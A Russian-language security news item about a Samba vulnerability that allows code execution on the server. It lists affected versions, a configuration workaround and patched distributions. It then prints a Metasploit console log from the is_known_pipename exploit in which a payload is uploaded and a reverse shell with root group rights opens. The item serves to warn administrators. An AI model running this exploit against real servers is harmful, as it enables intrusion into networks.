Уязвимость в Samba, позволяющая выполнить код на сервере
Уязвимости подвержены все версии Samba, начиная с 3.5.0, поэтому дополнительно подготовлены патчи для старых версий. В качестве обходного пути защиты можно добавить в параметр "nt pipe support = no" в секцию "[global]" smb.conf и перезапустить smbd. Обновления пакетов уже сформированы для FreeBSD, Debian, Fedora и RHEL. Проследить за выпуском обновлений пакетов в других дистрибутивах можно на данных страницах: Ubuntu, openSUSE, SUSE, CentOS.
Дополнение: Подготовлен прототип эксплоита, позволяющий выполнить код с правами smbd (обычно root) при наличии доступа на запись в хранилище. Администраторам Samba-серверов рекомендуется не затягивать с установкой обновления, так как вероятно появление поддержки данного эксплоита во вредоносном ПО, поражающем локальные сети (например, машина неквалифицированного пользователя может быть взломана через уязвимость в браузере, PDF-просмотрщике или запуск пришедшего по почте троянского ПО, после чего через эту систему может быть атакован внутренний Samba-сервер).
msf exploit(is_known_pipename) > exploit [*] Started reverse TCP handler on 192.168.0.3:4444 [*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path [*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so [*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so... [*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500 id uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)
Источник: http://www.opennet.ru/opennews/art.shtml?num=46591
|
0 | Tweet | Нравится |
|